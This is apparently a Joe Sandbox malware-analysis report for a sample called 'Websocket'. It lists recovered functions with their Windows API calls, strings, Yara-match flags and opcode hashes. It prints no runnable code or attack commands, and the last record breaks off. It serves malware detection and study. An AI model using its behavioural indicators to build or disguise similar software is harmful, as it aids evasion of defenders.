                                    • Opcode Fuzzy Hash: b540197c04a4096c67bc52c6181e49dc103387498643872b5df22096f0c2060f
                                    • Instruction Fuzzy Hash: FE91F271A043128BDB14DF64D8A1BEEB7E3ABC8310F0C852EE855DB350DA30DE958B91
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b4cb4ceeb99b27d04d461981ad2b3cb14c0d59e97dd2a0673e1abda0e18c0aab
                                    • Instruction ID: c120410f2f6f8d4cc9434338543c044b4d6e306a8908c48be494f9ecc57c48b8
                                    • Opcode Fuzzy Hash: b4cb4ceeb99b27d04d461981ad2b3cb14c0d59e97dd2a0673e1abda0e18c0aab
                                    • Instruction Fuzzy Hash: F851F375600202ABDB24DF689C517EB36E3EB85340F1C852AFA05CF361DB35CD929786
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,77385810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,77385810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • iPos=%d, xrefs: 0040F925
                                    • View My Processes, xrefs: 0040F9AC
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    • View All Processes, xrefs: 0040F991
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    • System process can't been terminated!, xrefs: 0040F950
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 007314DB
                                    • SetLastError.KERNEL32(0000007F), ref: 00731507
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637741644.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_731000_Websocket.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 6051255709d8ca6d3922b332002d0c1d203b79309da4551420f05953e9b460f9
                                    • Instruction ID: a6be09bbfe6d2794f7106b34fe3899a7141aa4d1b6372e5dfe543d44d0a03cb6
                                    • Opcode Fuzzy Hash: 6051255709d8ca6d3922b332002d0c1d203b79309da4551420f05953e9b460f9
                                    • Instruction Fuzzy Hash: D7711974E00109EFEB08DF94C581BADB7B2FF88304F648198D516AB352D738AE81DB90
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 00619F75
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00619F78
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 00619F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637575010.0000000000611000.00000020.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: true
                                    • Associated: 00000002.00000002.3637547977.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                                    • Associated: 00000002.00000002.3637617739.000000000061D000.00000004.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_610000_Websocket.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: :3K0$K<n($.v
                                    • API String ID: 2050909247-921737329
                                    • Opcode ID: 94817a47e41d01ae37784d4ed2cbfd74142b139b727af1155e30eb641aacb6ec
                                    • Instruction ID: 8272825aed6bc52d32ed7dc49c5e82ae1b20fe52be17daf51d008efc4e28bb70
                                    • Opcode Fuzzy Hash: 94817a47e41d01ae37784d4ed2cbfd74142b139b727af1155e30eb641aacb6ec
                                    • Instruction Fuzzy Hash: 7DB1A270B043104BDB54DFB49951AEA77A7AFC8B40F1C881EF446CB391DA34DD858BA6
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(02321660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3637265687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000002.00000002.3637234596.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637302044.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637346575.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000002.00000002.3637382990.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Websocket.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
